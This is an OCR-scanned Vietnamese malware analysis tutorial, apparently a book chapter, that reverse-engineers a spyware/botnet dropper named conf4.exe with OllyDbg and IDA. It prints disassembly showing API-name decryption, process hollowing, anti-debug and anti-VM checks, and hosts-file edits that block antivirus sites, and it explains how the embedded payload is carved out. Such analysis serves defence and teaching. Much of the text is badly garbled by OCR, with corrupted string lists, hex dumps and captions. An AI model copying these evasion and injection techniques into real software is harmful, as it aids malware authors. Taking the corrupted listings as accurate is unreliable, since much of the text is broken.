Sau khi load xong Exeinfo PE cho biết file được giả sign ( chữ kí để 
không bị phát hiện bởi complier packer, bởi các chương trình check 
sign) 

Thong tin chi tiét thu duoc nhu sau: 

SHA256: 
c09b262b940d22c7f0b6956aee09492640db666 1 6bf70e4cdf6b1e7eae068 
28 

File name: conf4.exe 

Detection ratio: 25/44 

Analysis date: 2012-11-04 

File này là một Spy/ Bot Net đã bi 25/44 trình diệt virus co bản trên 
virus total xác định. 

https://www.virustotal.com/file/1c09b262b940d22c7f0b6956aee0949 
a640db66616bf70e4cdf6b1e7eae06828/analysis/1352017991/ 

Thử tìm kiếm với Hash của file trên google không thu được kết quả nao 
cả, như vậy file với hash này chưa có kết quả phân tích nao cả. 

Ta tiến hành kiểm tra. 

Đưa vào máy ảo, Load với OllyDbg. 
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Xem memorymap các section, chương trình dang dừng ở entrypoint. 
Chỉ có một lệnh mov địa chỉ và jump đơn giản. Các section tương đối 
giống với ngôn ngữ Delphi ngoại trừ section .End ở cuối cùng. Như vậy 
ta xác định Malware đã thay đổi entry point xuống một section mới ở 
cuối để ngăn không cho các chương trình tìm kiếm info tìm complier, 
các info... Hoặc đánh lừa các antivirus. 


ig - conf4.exe 


w Debug Trace Plugins Options Windows Help 


| >j>|H| wun 3|U| 1ị E|M|w|TỊc| R|--| s|M|H| iz 


INT3 — o || & || 3% 
CPU - main thread, module conf4 

- BS 48334000 [MOV EAX, 00403348 IM] Memory map 
30 105 || - NO! e å 


Address |Size 
00405000 
00406000 
00407000 
00408000 
00409000 
00404000 
0040B000 
00422000 
00430000 
005B0000 
005E0000 


00001000 | con£f4 
00001000 | conf4 
00001000 | cđon£f4 
00001000 | con£4 
00001000 | con£4 


00017000 | cđon£4 
00001000 | con£f4 
00020000 
00003000 
00003000 


Hình 4-30 Xem memorymap các section 
Edit lai Entry Point vé 3348 (403348 — Image Base). Ta kiém tra lai va 
thay 


Entry Point: 00003348 oo (<) EP Section: CODE Kal za 

File Offset: 00002748 First Bytes: 55,8B.EC.B9.6( [-) (5) 
Linker Info: 2,25 SubSystem ` Windows GUI (Fatou) 
File Size: 0001C230h (<)  Overay: 00000980 — 
Image is 32bit executable RES/OVL:81/2% 2004 


Borland Delphi ( 2.0 - 7.0 ) 2004 - www.borland.com + UNKNOWN PRC e) 
Lamer Info - Help Hint - Unpack info $ 


Lem) Lom 1 


Hinh 4-31 Kiém tra lai sau khi edit Entrypoint vói Bieito PE 
Nhìn vào ta thấy nó được viết bang Borland Delphi. 
Lay ngay được thông tin về complier, rất có thé chương trình không 


được pack. Ta chuyền sang load bằng IDA. IDA dừng ngay ở entrypoint. 
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Ngay tai đây packer thực hiện push hàng loạt các đoạn chuỗi lạ. Rất có 
thé đây là quá trình giải mã các chuỗi dé sử dụng, thực hiện cho chương 
trình. 


| Im) FR | EE 
| p Pseudocode- x : X 
CODE: 00403348 var_14 = dword ptr -l4h 
CODE : 00403348 
* CODE: 00403348 push ebp 
* CODE: 00403349 mov ebp, esp 
* CODE : 00403348 mov ecx, 60h 
CODE: 00403350 
C0DE:00403350 loc 403350: ; CODE XREF: start+DJj 
* CODE : 00403350 push 0 
* CODE: 00403352 push 0 
* CODE: 00403354 dec ecx 
* CODE: 00403355 jnz short loc 403350 
* CODE: 00403357 mov eax, offset dword 403308 
* CODE :0040335C call ` sub 40225C 
* C0DE:00403361 xor eax, eax 
* CODE : 00403363 push ebp 
* CODE: 00403364 push offset loc 4043AE 
* CODE: 00403369 push ` dword ptr fs: [eax] 
* CODE: 0040336 mov fs: [eax], esp 
* CODE: 0040336F call ` sub 4023E0 
* CODE: 00403374 mov eax, offset dword_406CBC 
* CODE: 00403379 mov edx, offset aTideyipo ; "tideyipo" 
* CODE: 0040337E call — sub_40151¢ 
* CODE: 00403383 mov eax, offset dword 406CCC 
* CODE: 00403388 mov edx, offset aRahaxaxi ; "rahaxaxi" 
* CODE: 0040338D call — sub 40151C 
* CODE: 00403392 lea edx, [ebp+var_18] 
* CODE: 00403395 mov eax, offset aUXszrm5l6]lvrrd ; "u/XSzRM516LvRRds " 
* CODE: 0040339 call — sub 402020 
* CODE: 0040339F mov eax, [ebp+var_18] 
* CODE: 00403342 lea ecx, [ebp+var_14] 
* CODE: 004033A5 mov edx, ds:dword 406CBC 
* CODE: 00403348 call — sub 402EE4 
* CODE : 00403380 mov edx, [ebp+var_14] 
* CODE: 00403383 mov eax, offset dword 406CAC 
* CODE: 00403388 call ` sub 40151C 
* CODE: 004033BD lea edx, [ebp+var_20] 


Hình 4-32: Xuất hiện các hàm giải mã 
Có nhiều phương pháp để sử lý các hàm giải mã này nhưng phương 
pháp đơn giản nhất là tiếp tục sử dụng Olly, debug xem các hàm này 
thực hién giải mã gi. 
Qua vài lượt trace dễ dàng thấy được chương trình giải mã các chuỗi 
sau, lưu vào stack, lưu vào một số địa chỉ. 


Tên các hàm tìm được từ quá trình giải mã chuôi: 
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EEF-1434 BESAZFS8/ASCII “GlobalLock™ 

EBF- 1 34 BeESAZDSH 

EEE-lISE BESAZFSH|/ASCII “SetClipboardData™ 
EBEF-128 DDO0Z2E 20 

EBEF-124 BESAZEBS|ASCII “CloseClipboard™ 
EEF-1z&8 DD 2 e 

EBR—12C HESAHZESS| ASCII “Open lipboard 
EEEET== BESAZD43 

EBP-124 BHESAZDFH| ASCII “GetClipboardData™ 
EBFP-128 DD ZC 

Ile US BESAZDBS|ASCII ""EtliLDecomprezsbEuffser'" 
EBFP-118 BeSAZAHSS 

EEF-114 BESAZDLE| ASCII ""HeagiuerulalusEuH'" 
EBFP-116 BeESAZC1LE 

EEE— 1E BESAZCAS|/ASCII '"ReaüpenkeuEuHnH'"" 
EEE—-liE DD ZPP 

EEF-1t654 nmneasgnazc4dao|mHSscII “Regllosekey™ 

EEF- 1 nmnagasanmazmaa 


EBEF-FLC HESAZBES|ASCII "'"REegSetüalueEzuH'" 
EEF-FZ BeSAZAFS 

EEE-—E + BESAZBSS|/ASCII ''"ReacreatekeuEuH'" 
EBEF-FtE BESAZS2H 

EEE-EE HHSHZ-2EZE ASCII '"'"ReaüpenksuH'" 
EBP-ES DD 2 

EEF-E4 BESAZACS| ASCII “Get TemprPathA™ 
EBF-EE HESAZS1LE 

EEE—DL DOG Ze) ASCII ""I5ñetEnt+Lreanra=n tL1ar- iableA™ 
EEE—-DE= BESAZSSH 

EBF-O4 BESALSFS/ ASCII “CreaterFi lea 
EEE—-DE BESAZSEH 

EBP-CE BESAZ9SCH|/ASCII “GetNody LeF i LeFlara=H"” 
EBE- CS HeSAZTBe 

EBFP-C4 BESAZ95H/ASCII “GetWindowsDirectoryA™ 
EEE-LE DD 2 Co 

EEF-EBLC BESAZSBH| ASCII “GetCommandlineA™ 
EBFP-BS DO 2 

EEE-E+ BESAZSSH@/ASCII “OpenProcess™ 
EBFP-Bae HeSAZEBE 

EBF-AC HESAZTES|ASCII “TerminateProcess™ 
EEE—-HE BHESALZSFa 

EEF-H4 BHSAZTSH|/ASCII “ResumeThread™ 
EBF-HE DD ZE 

EBF-*9rC Bmno2H2zgoz8|HScCII "'""CreatebrocezzH'" 
EBF-*92 DD 22 

EBF-34 BESAZE6ES|ASCII “Set ThreadContert™ 
EBP- 38 DD 2 

EEE-—-EL- BESAZErSs|ASCII “Get ThreadContert™ 
EEE-ESE= HeSAZ5EH 

EBF-24 BESAZE46/ASCIIL ""EReadFProecezsshemoru"" 
EEF-Z28B BeSAZ4FH 

EEE=rE BESAZ5O08)/ASCIIC "ile iteProcesshemory'" 
EEEP-r= HeESAZ4Ba 

EEF-74 nmnagasnuazesazs|mHSscII ''"lirtualProtectEau'" 
EEE-rE DD 2223 

EBF-é6C HESAZ4S5/ASCII “UWirtualAl locks" 
EBP-68 DD 22 

EEE-E=+ nmneaognaz4d2a2|HScII "Freel ibrary" 
EBbP-Gp SIS SE 

EEE-ELE BESAZSCE|/ASCII “SizectResource™ 
EEE—-EE= BeSAz208 

EBF-54 Hganz2e2|HSCcII “FreeResource™ 
EBEF-5H8H nmnaagnaiasa 

EBP-4C BESAZSH8/ASCII “LockResource™ 
EEE—-+E= BASAZ iDEA 

EBF-44 GASAZZ2ZAS| ASCII “LoadResource™ 
EEE—-+E necare mda 

EBE- 32C BESA2Z26H/ASCII "F indResourceA™ 
EBRP-38 HeSA24195 

EEE-=+ BESAZ246|/ASCII “2wUnmapliewoFf Sect ion" 
EEE-=ẽ BeSAZBAS 

EBR=2C HESAZ1I6S|)/ASCII “userse.dil™ 

EEE-== nmneaaoapegnms 

EEE-=+ Hmnasnuazimdaz|mHscII “advapise.dtt™ 


Hình 4- 33: Danh sách các chuỗi được giải mã tìm được bằng Debug 
Tiếp tục kết hợp Olly ta xác định được. 
Sub_402EF4 là hàm giải mã. Ta dinh danh lại trong IDA 
Sub_4029F4 là hàm tương đương với hàm GetProcessAddress. Ta viết 
lại tên trong IDA. 
Chương trình sử dung Sub_4029F4 dé lay dia chỉ của các tên hàm đã 


được giải mã. Lưu vào hàng loạt địa chỉ. 
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LODE: UU4U54E4 
CODE : 004034E7 
CODE : 004034EA 
CODE :004034F0 
CODE : 004034F 5 
CODE : 004034F8 
CODE : 004034FD 
CODE : 00403502 


CODE : 00403508 
Cane -NNANASNA 


Hinh 4-34 Su dung ham co chuc nang tuong tu ham GetProcAddress 
dé lay địa chi Hàm trong dll (đã viết lai tên thành GetProcAddress ở 
trong IDA) 

Luu dia chỉ hàm LockResoucre vào offset 4051 Ic. 


mov eax, [ebp+var_ 50] 

lea ecx, [ebp+LockResource] 
mov edx, ds:trunggian 

call giaima 

mov edx, [ebp+LockResource] 
mov eax, ds:kernel32 

call GetProcAddres 

mov edx, ds:off_40511C 

mov [edx], eax 

lea env Tehnavar SRT 


Ta thực hiện viết lại tên các hàm cho hàng loạt các địa chỉ dé dễ dàng 


hơn cho việc Disasm: 


UU24U53UUC, 
004050E0 
004050E4 
004050E8 
004050EC 
004050F0 
004050F4 
004050F8 
004050FC 
00405100 
00405104 
00405108 
0040510c 
00405110 
00405114 
00405118 
0040511C 
00405120 
00405124 
00405128 
0040512C 
00405130 
00405134 
00405134 
00405138 
0040513c 
00405140 
00405144 
00405144 
00405148 
0040514c 
00405150 
00405154 
00405154 
00405158 
0040515c 


OTT_4U2UDU 
off 4050E0 
off 4050E4 
off 4050E8 
off 4050EC 
off 4050F0 
off 4050F4 
off 4050F8 
off 4050rc 
off 405100 
off 405104 
off 405108 
off 40510c 
off 405110 
off 405114 
off 405118 
off 40511C 
off 405120 
off 405124 
off 405128 
off 40512C 
off 405130 
off 405134 


off 405138 
off 40513C 
off 405140 
off 405144 


off 405148 
off 40514C 
off 405150 
off 405154 


off. 405158 
of f_40515¢ 


oTTset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 
offset 


offset 
offset 
offset 
offset 


offset 
offset 
offset 
offset 


offset 
offset 


AUVAPI5Z Keg»etvalueExA ; DAIA XKEF: STArT+OVC IPT 
USER32. GetClipboardData ; DATA XREF: start+81/Tr 
WriteProcessMemory ; DATA XREF: start+2EC†r 
kerne132 GlobalUnlock ; DATA XREF: start+991Tr 
ZwUnmapViewOfSection ; DATA XREF: start+l2l†r 
CreatProcessA ` DATA XREF: start+3E8†r 

dword 406860 ; DATA XREF: start+DAFTr 

USER32 OpenClipboard ; DATA XREF: start+856Tr 
ADVAPI32 RegCloseKey ; DATA XREF: start+/1BTr 
Wow64GetThreadContext ; DATA XREF: start+36ATr 
ADVAPI32 RegOpenKeyA ; DATA XREF: start+65E†r 
VirtualAllocEx ; DATA XREF: start+286Tr 

dword 406868 ; DATA XREF: start+CF5†r 


kerne132 GlobalAlloc ; DATA XREF: start+9D0Tr 
kernel32 GetTempPathA ; DATA XREF: start+61FTr 
LoadResoucre ; DATA XREF: start«1871r 
LockResoucre ; DATA XREF: start+lBA†r 


SizeOfReSoucreA ; DATA XREF: start+220Tr 
VirtualProtectEx ; DATA XREF: start+2B9Tr 
kerne132 GlobalLock ; DATA XREF: start+913†r 
USER32 CloseClipboard ; DATA XREF: start+895†r 
ReadProcessMemory ; DATA XREF: start+32B†r 
kernel32 GetModuleFileNameA ; DATA XREF: start+562Tr 
start+E0/7Tr 

ADVAPI32 RegCreateKeyExA ; DATA XREF: start+69D†r 
ADVAPI32 RegOpenKeyExA ; DATA XREF: start+/5ATr 
FreeResoucre ; DATA XREF: start+lED†r 
kerne132. GetEnvironmentVariableA 

; DATA XREF: start+5E0Tr 
kernel132 GlobalSize ; DATA XREF: start+952Tr 
USER32 SetClipboardData ; DATA XREF: start+8D4Tr 
dword 406864 ; DATA XREF: start+C3B†r 
kerne132. GetwindowsDirectoryA 

; DATA XREF: start+523†r 
kerne132 GetCommandLineA ` DATA XREF: start+4E4†r 
TemriteProcess ; DATA XREF: start+466†r 


Hinh 4-35: Viét lai tén hàng loat các dia chi 


Tién hành find refer. Ta xác dinh duoc mót só cong tác chính cua 


chuong trinh nhu sau. 
Sub 4025D4 thực hiện dùng hàm FileAttributesA kiểm tra thuộc tính 
các file, sửa lại các thuộc tinh file dé án ... 
Sub_402B88, 402AF0 tiến hành load Resoucre chứa các binary của các 


virus. 
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Sub 402734 tién hành: tạo một process mới, supend Process vừa tạo 


write lại process thành exe mới, resumprocess với chức năng nhiệm vu 


moi. 


CODE : 004028C3 
(CODE : 004028C5 
CODE : 004028C8 
CODE : 004028C9 
CODE : 004028CE 
CODE : 004028D1 
CODE : 004028D2 
CODE : 004028D7 
CODE : 004028D8 
CODE : 004028DE 
CODE : 004028E1 
CODE : 004028E4 
:004028E7 
CODE : 004028EC 
CODE : 004028F1 
CODE : 004028F6 
CODE : 004028F7 
CODE : 004028FD 
CODE : 00402900 
CODE : 00402902 
CODE : 00402903 
CODE : 00402905 
CODE : 00402907 


eeee'seeeeeee ee eeeeeeee2e2e2e28 
a 
o 
o 
m 


CopF : 00402915 : 


4 

eax, [ebp+var_C] 

eax 

eax, ds:dword_406828 
eax, 

eax 

eax, ds:dword 406730 
eax 
ds:WriteProcessMemory 
eax, [ebp«var 1C] 
eax, [eax+28h] 

eax, [ebp+var_C] 

ds: dword_406834, eax 
offset dword_406784 
eax, ds:Hanle 

eax 

ds: SetThreadContext 


al, al 

short loc_402915 
eax, ds:Hanle 
eax 

ds: ResumThread 
short loc_402923 


Load bang ollydbg Break Point tai 402734 dé doi xem no write gi 
nhưng không thành công, vậy là có ham check debug. Trace into từng 


bước, dat Break Point tại các hàm khả nghi, có refer đến hàm exit 


process. Ta xác định được: 


Sub 4016F8 được call tại 0040412B là hàm check debug. jnz 
loc_404373 là jump đến cuối chương trình thực hiện exit process. 


3484 130 |» FSS_ 3082080 


CALL O04016F8 


LINE 884843 
CALL 00402504 


Hình 4-36: Gọi Hàm check debug 


Tiến hành sửa đổi bằng cách sửa lệnh các thành các lệnh gọi hàm NOP. 


Hình 4-37: Gọi hàm NOP 


Tiếp tục run chương trình dừng lại ở 404364 nơi mà ta đã đặt break 


point lời gọi hàm thực hiện rewrite process. Tiếp tục trace vảo trong hàm 


đặt thêm một số break point tại các ham API WriteProcessMemory ta 


xác định được buffer ( vùng nhớ lưu các dữ liệu được write lai). 
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m 


EE 
" PTR EA 


] Ts ` w d 0d , PRA [T] ri " 
AUTERLEEEEEIILIIUIMMM MM dP A, 
CR M BiteTaleit z d T (4056, | 
+, CECE EE WB1IBIHIERBIILBIIER V ^ ï af ˆd 
OA Ga Aà Ga GO 111101011111 eS HA) MAC drem = ICH 
Wl id) He IF E4 OE GB B4 69 CD dl E. Bl i£ (0:21 54 đi Midd CHR F à - de eis 
DOIBA2EO 69 73 20 rộ 72 GF &7 72 61 oD 20 63 6Í 6E 6E | ie progran cann 


Hinh 4-38: Xác dinh duoc vüng buffer 
Tai vung dùng liệu 184260 chứa hang loạt dữ liệu có cau trúc là một PE 


file, hiển nhiên đây là thứ ta cần tìm, chính là modul hoạt động chính của 
chương trình được viết lại vào một process mới. 

Save Data bang cách Backup-> save data to file 

File cần lay bat đầu từ oe Hn 


3845 E4 
S3CO 18 

ES S7FEFFFF 

8945 EG 

8D45 EC 

Se SUM — 

803498 ireakpi :[EBXTEBXM4] 
8845 EO fe : [EBP-201 
8B44FO 10 ° : [ERX+ESIw8+1813 
8845 EO | : LEBP-201 
8B44FO 14 :[ERX«ESIAS414J 
83C7 " 


L †Th 
is program canno 
t be SA in 


T» 
z)áuz((A€"9"uApziÀ 
sep: (ãRich8#(Á 


9 
4 
8 
8 
2 
6 
2 
2 
E 
6 
a 
2 
5 
ð 
Cc 
G 
3 


© 
HE 


Tha 1 GADO c 


Hinh 4-39: Luu file càn láy bát dàu tir offset 184260 
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Vung di liệu bat đầu từ 15e000. Nhu vậy sau khi save ra PE file ta cần 
bắt đầu từ 184260-15e000:26260. Ta dùng một trương trình edit lại file 
dữ liệu vừa save ra: 

00026240 | 00 00 00 00 00 00 00 00 0000 0000 0000 0000 ................ 
00026250 | b6 03 031c 0010 0000 011c 041c af OL 0800 {........... sr 
00026260 (E 9000 0300 0000 0400 0000 ff ff 00 00 -——ro s 
00026270 | bê 00 00 00 00 00 00 00 4000 0000 0000 0000 .,....... TT 
00026280 | 00 00 00 00 00 00 00 00 0000 0000 0000 0000 ................ 
00026290 | 00 00 00 00 0000 00 00 0000 0000 e000 0000 ............ du 
00026280 | 0e 1f ba 0e 00 bd 09 cd 21b8 Ol de cd21 54 6B ..°..“.Í!,,LÍ!Th 
000262b0 | 69 73 20 70 72 6£ 6772 61 6d 20 63 61 6e 6e 6f is program canno 
00026200 | 74 20 62 65 2072 756e 2069 6e 20 44 4f 5320 tbe run in DOS 
00026240 | éd 6f 64 65 2e 0d 0đúa 2400 0000 0000 0000 mode....t....... 
000262e0 | ad 96 46 dd e3 £7 28 Be e9 f? 28 8e e3 f? 28 be --Fiés(2es (de (d 


........ sm Ba shew Bu 1d 


Hình 4-40: Sửa lại file với hexeditor 


Xóa hêt các dữ liệu ở phía trên di rôi save lai. 


Entry Point: 0000883A oo («] EP Section: text mim: 
File Offset: 0000883 — First Bytes: 55,8B.EC.6A.FF (=) (S) (Plua) 
Linker Info: 6,0 SubSystem ` Windows GUI  ||#Absutl| 
FileSize:  Q001FDADh (<) Overlay:  Q0011DAD — 
4 Image is 32bit executable RES/OVL:0/56% 2010 Exit 

Microsoft Visual C++ ver 5.0/6.0 , Overlay -------------------------------------- 
Lamer Info - Help Hint - Unpack info 3952 MB Total Physical Memo 
Not packed , try disassemble OllyDbg ( wwv 


Hình 4-41: Kiểm tra với file vừa sửa 
File viết bằng Visual C++ 5/6 vẫn bị lỗi ta kiểm tra lại. Phần đầu ta đã 
sửa lại xóa hết đữ liệu thừa. Vậy rất có thể phần cuối thừa dữ liệu. Ta 


xem các section của file xem raw offset kêt thúc ở đâu: 


161 


Nr Virtual... Virtuals... RAWD... RAWsize Flags Name First bytes (hex) First Ascii 20h b... 
Dien 00001000 00007E26 00001000 00008000 60000020 .text 8B 4C 240488 41180... L$ AT L$l ... 
02im 00009000 000010C4 00009000 00002000 40000040 .rdata 7C A0 00 00 44 A0 000.. |D 6j X. 
03 00008000  00045C9C 00008000 00003000 C0000040 .data 00 00 00 00 11 2C 40 0... 4@ 88 [n... 


Left Mouse Button - cor 


Section status : Section size : 
03 Executable Readable Writable 12KB O ose | 
-> RAW decimal size: 12288 bytes = 12.00 kb = 0.01 MB <- 
Hinh 4-42: Xem các section cua file 
Rawdata của section cuối B000, size 3000. Vậy file kết thúc tại 
B000+3000 = E000. Ta lại dùng hexedit xóa hết phần dữ liệu bắt đầu từ 
E000. 
Vậy là ta đã có được File hoàn chỉnh. File này mới là file chính thực 


hiện mọi nhiệm vụ của chương trình. 
Tiếp tục phân tích file mới tìm được này. Load chương trình này vào 
IDA, IDA dừng lại ở hàm Main. 


pusn epx 

push esi 

push edi 

call GetFunction 

call checkSafeSys 
call Kiemtramayao 
test eax, eax 

jnz loc. 402A52 


call checkdebug 
test al, al 


jnz loc 402A52 

call ds:GetCurrentProcess 
mov esi, eax 

push esi 

call checkDebug2 

cmp al, 

pop ecx 


Hinh 4-43: Dừng lai ở ham Main 
Kiém tra hàm dau tién là hàm thuc hién GetProcessAddress hàng loat 
các ham ở các thu viện  Kernel32,User32, advapi32.dl, 
shell32.dll,mdr.dll, dnsapi.dll ... 


Luu vào các dia chí: 
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data: 0040BC28 ; 
. data: 0040BC28 
. data: 0040BC34 
. data: 0040BC34 
. data: 0040BC4B 
. data: 0040BC4C ; 
. data: 0040BC4C 
. data: 00408C63 
. data: 0040BC64 
. data: 0040BC64 
.data:00408C/8 ; 
. data: 00408C78 
data: 0040BC8C ; 
. data: 0040BC8C 
.data:00408C04 ; 
. data: 0040BC94 
.data:0040BCA0 ; 
. data: 0040BCA0 
. data: 0040BCAC 
. data: 0040BCAC 
. data: 0040BCB7 
.data:0040BCB8 ; 
. data: 0040BCB8 
. data: 0040BCC9 
. data: 0040BCCC 
. data: 0040BCCC 
. data: 0040BCDA 
. data: 0040BCDC 
. data: 0040BCDC 
. data: 0040BCE9 
.data:0040BCEC ; 
. data: 0040BCEC 
. data: 0040BCEC 
. data: 0040BD09 
.data:00408D0C ; 
. data: 0040BD0C 
. data: 00408D22 
.data:00408D24 ; 
. data: 0040BD24 
. data: 0040BD2F 
. data: 00406030 
. data: 00408D30 
. data: 00408D3D 
. data: 00406040 
.data:(40Rn50 


char aShe1132 dll[] 
aShell32 dl] db 'she1132.d11',0 
; char aWnetcancelco OI 
aWnetcancelco D db 'WNetCancelConnection2w' ,0 ; 
align 4 
char aWnetcancelconn[] 
aWnetcancelconn db 'WNetCancelConnection2A',0 ; 
align 4 
; char aWnetaddconne_0[] 
aWnetaddconne D db 'WNetAddConnection2w' D: 
char aWnetaddconnect [] 
aWnetaddconnect db 'wWNetAddConnection2A',0 ; 
char aMpr_d11[] 
aMpr_d]] db 'mpr.d]1',0 d 
char aGetudptable[] 
aGetudptable db 'GetUdpTable',0 
char aGettcptable[] 
aGettcptable db 'GetTcpTable',0 > 
; char aGetiftable[] 
aGetiftable db 'GetIfTable' ,0 : 
align 4 
char aDeleteipnetent[] 
aDeleteipnetent db 'DeleteIpNetEntry',O ; 
align 4 
; char aGetipnettable[] 
aGetipnettable db 'GetIpNetTable',Ü — ; 
align 4 
; char aIphlpapi. dll[] 
aIphlpapi dl] db 'iphlpapi.dl1',0 : 
align 4 
char aDnsflushreso, DI 
aDnsflushreso 0 db 'OnsFlushResolverCacheEntry. A' ,0 
ETAN ; DATA XREF: GetFunction+53Eto 
gn 


char aDnsflushresolv{] 

aDnsflushresolv db 'DnsFlushResolvercache',0 ; 
align 4 

char aDnsapi_d]1[] 

aDnsapi. dll db 'dnsapi.dll',0 

align 10h 
; char aNetapiJ2 dl 
aNetapi32 dl] db 'netapi32.d11',0 


align 10h 
aMozillad O0Comp db b orat H (compatible)',0 ; 
al jan 


Hinh 4-44: Luu cac dia chi 


; DATA XREF: GetFunction: loc_40479C†o 


DATA XREF: GetFunct1on+02B†o 


DATA XREF: GetFunction+61Eto 


DATA XREF: GetFunction+611†o 
DATA XREF: GetFunction+609to 
DATA XREF: GetFunction: loc 40472810 
` DATA XREF: GetFunction+5AF to 
on+5A2†o 


on+595to 


DATA XREF: GetFuncti 


DATA XREF: GetFuncti 


DATA XREF: GetFunction+588to 


DATA XREF: GetFunction+580To 


DATA XREF: GetFunction: loc_40469F to 


DATA XREF: GetFunction+536To 


` DATA XREF: GetFunction: loc 40465510 


` DATA XREF: GetFunction:loc 40464010 


DATA XREF: GetFunction+4E/to 


sub 4013C tiép theo thuc hién kiém tra hàng loat các chuong trinh 
analysis nhu: WireShark, TCPview, Process monitor, file mon. (kiém tra 
báng các phuong pháp co bàn nhu: Registry search, EnumProcess- 
search...) 

Ví du Registry search: 
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>»uU €»p, 441 


push ebx 

push esi 

mov eax, 10000h 

push edi 

push eax ; Size 

mov [ebp+NewSize], eax 

call ds:malloc 

mov [ebp+Memory], e 

mov AS dada 60]. 310h 
push 

lea Ze eegen — 

push offset Format ; "4d %d" 
push eax : Dest 
call ds:sprintf 

add esp, 10h 

lea eax, [ebp+NewS1ze] 

mov esi, ds:RegQueryValueExA 
xor ebx, ebx 

push eax ; lpcbData 
lea eax, [ebp+VaTueName ] 

push [ebp+Memory] ; lpData 
push ebx ; lpType 
push ebx ; lpReserved 
push eax ; lpValueName 
push 80000004h ; hKey 


call esi ; RegQueryValueExA 
mov edi, OE 


Hinh 4-45: Registry search 


Hàm sub 4049B9 hàm kiém tra sanbox, vnware.. 
+ LEAL: VVV IJOY Val 0 = uwuru pur “0 
,text;00404989 pcb0uffer e dword ptr -4 
„text; (00404989 


* text: 00404989 push ebp 

* text: 004049BA mov — ebp, esp 

* text: 0040498¢ sub — esp, 94h 

* text: 00404902 -= esi 

* text: 00404903 ea eax, [ebpipcbBuffer] 

* text: 004040c6 push ` edi 

* text: 0040407 push eax + pcbBuffer 

* text:004049c8 ea — eax, [ebpsStr] 

* text: 004049CE mov [ebpsvar.14], offset aSandbox ` "sandbox 
* |, text: 00404905 push eax | ; Ipbuffer 

' text: 00404906 mov (ebpsvar_l0], offset aHoney ; “honey 

* text: 00404900 mov [ebpsvar_c], offset avmware ; T 

* text: 0040404 mov [ebpsvar. 8], offset aCurrentuser ` “currentuse 
* , text: 0040498 mov  Íebpspcbluffer), 80h 

* , text;004049F2 call — de:GetUserNameA 

* text: 00404968 lea — eax, [ebpsStr) 

* text: 004040rE push — eax + Ipsz 

* text: 004049FF call — ds:CharLowerA 

* text: 00404405 xor edi, edi 

* text: 0040407 lea — esi, Iebpsuar 14] 


Hinh 4-46: Kiém tra mói truóng ào 
sub 404C01, sub 404A31 là 2 sub kiểm tra debug(düng ham 
ZwQuerySystemInformation, ZwQueryInformationProcess) 
Sửa tên đánh dau lai khi nào debug ta patch nop các hàm này lại. 
Tiếp theo là một hàm sub_ 404C26 với trách nhiệm edit lại file host 
thêm hàng loạt các trang web của các hãng antivirus trỏ về địa chỉ 


127.0.0.1 ngăn cản ta down các phần mèm diệt virus. 
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Openfile host: 


zIIMWo¡ push th 

“70040428 mov ebp, ds:fopen 

BI 6): push e 

OC push edi 

0040430 mv esi, offset Filename ; "V WINDONS V Systen22 drivers V etc hosts" 
"DICH push offset Mode ; "r" 

UD push pi ; Filename 

004048 Call dy ; fopen 

z ICD mov edi, eax 


Hình 4-47: Openfile host 


Printf thêm các chuối vào: 


ext:00404C98 jz loc 404£42 

ext: 00404C9E mov esi, ds:fprintf 

ext: 00404cA4 push ` offset al27_0_0_lwww_s ; "\n127.0.0.1\twww. symantec. com\n” 
ext: 00404CA9 push ` edi ; File 

ext: 00404CAA call esi ; fprintf 

ext: 00404CAC push ` offset a127 0 0 15ecur ; "127.0.0.1\tsecur1tyresponse. symantec. com". . . 
ext: 00404CB1 push ` edi ; File 

ext: 00404CB2 call — esi ; fprintf 

ext: 00404CB4 push ` offset a127 0 0 1Syman ; "127.0.0. 1 tsymantec. com n" 

ext: 00404CB9 push ` edi ; File 

ext: 00404CBA call esi ; fprintf 

ext: 00404CBC push ` offset all! 0 0 Iw 0 ; "127.0.0.1\ttww.sophos. com Wn" 
ext:00404cc1 push ` edi ; File 

ext: 00404CC2 call esi ; fprintf 

ext: 00404Cc4 push ` offset a127 0 0 1Sopho ; "127.0.0. 1 tsophos . com n" 

ext: 00404CC9 push ` edi ; File 

ext: 00404CCA call esi ; fprintf 

ext: 00404CCC push ` offset al27 0 0 www m ; "127.0.0.1\twww. mcafee. com\n" 
ext: 00404CD1 push ` edi ; File 

ext: 00404CD2 call esi ; fprintf 

ext: 00404cD4 push ` offset al2/_ 0 0 IMcafe ; "127.0.0.1\tmcafee.com\n" 
ext:00404cD9 push ` edi ; File 

ext: 00404CDA call — esi ; fprintf 

ext: 00404CDC push ` offset a127 0 0 1Liveu ; "127.0.0.1\tliveupdate. symantec]1veupdate”... 
ext: 00404CE1 push ` edi ; File 

ext: 00404CE2 call esi ; fprintf 

ext: 00404CE4 add esp, 40h 

ext: 00404CE7 push ` offset a127 0 0 ww v ; "127.0.0.1\twww.viruslist.com\n" 
ext: 00404CEC push ` edi ; File 

ext: 00404CED call  esil[; fprintf 

ext: 00404CEF mov ebx, offset a127 0 0 1Virus ; "127.0.0.1\tviruslist.com\n" 
ext: 00404cF4 push ebx ; Format 


Hinh 4-48: In thém các chuói 
Ó tiép theo xuát hién vài hàm giái má dé lay các khóa registry can dáng 


ky. Ta debug láy các chuói giái mà duoc. 
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* |. text: 004027D9 lea eax, [ebp«Filename] 

* |. text: 004027DF push esi ; nSize 

* |. text: 004027E0 push eax ; lpFilename 

* |. text: 004027E1 push ebx ; lpModuleName 
* |. text: 004027E2 call ds:GetModuleHandleA 

* |. text: 004027E8 push eax ; hModule 

* |. text: 004027E9 call ds:GetModuleFileNameA 

* |. text: 004027EF lea eax, [ebp+CurrentDi rectory] 

* |. text: 004027F5 push esi ; nSize 

* |. text: 004027F6 push eax ; lpDst 

* |. text: 004027F7 push offset windir ; " P isof ke! " 

* |. text: 004027FC call GiaiMa 

* |. text: 00402801 pop ecx 

* |. text: 00402802 push eax ; lpsrc 

* |. text: 00402803 call ds:ExpandEnvi DC a TN 

* |. text: 00402809 mov esi, offset Tskconf exe ; "»éÉyooY«PaP" 
* |. text: 0040280E push esi ; Source 

* |. text: 0040280F call GiaiMa 

* |. text: 00402814 ush eax 

* |. text: 00402815 ea eax, [ebp«CurrentDirectory] 

* |. text: 00402815 push eax 

* |. text: 0040281C lea eax, [ebp+ApplicationName] 

* |. text: 00402822 push offset aSS ; "%s\\%s" 

* |. text: 00402827 push eax ; Dest 

* |. text: 00402828 call ds:sprintf 

